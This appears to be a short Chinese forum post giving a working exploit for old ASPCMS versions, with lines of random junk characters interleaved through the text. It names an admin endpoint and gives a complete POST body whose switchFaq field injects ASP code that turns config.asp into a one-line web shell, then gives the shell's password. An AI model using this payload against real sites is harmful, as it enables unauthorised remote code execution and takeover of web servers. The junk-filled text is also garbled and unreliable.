老的ASPCMS版本的秒杀拿SHELL漏洞
4 S8 b6 c& f4 \9 I; j5 U/ T! g9 I/ Y# K8 c* Z; t
找到后台。。。然后
. x0 }5 m1 _: V+ Q" t
4 M' J. u$ C' O0 I/admin/_system/AspCms_SiteSetting.asp?action=saves
7 h6 q" h- ~% z% `+ s/ v) Q9 y 9 f. }2 J, w7 U! C
直接POST9 \# ~9 T" _7 G
$ r/ }0 h' ~ s$ f
runMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&SwitchFaqStatus=0&dirtyStr=&waterMark=1&waterMarkFont=hahahaha&waterMarkLocation=1&smtp_usermail=aspcmstest%40163.com&smtp_user=aspcmstest&smtp_password=aspcms.cn&smtp_server=smtp.163.com&MessageAlertsEmail=13322712%40qq.com&messageReminded=1&orderReminded=1&applyReminded=1&commentReminded=1&LanguageID=1
M) B9 V; L/ x( A- `& l/ d6 d 9 G3 T& i* f) h0 q8 c
再连接配置文件config.asp 密码为#( A/ ]/ T0 A1 Q" B7 q
|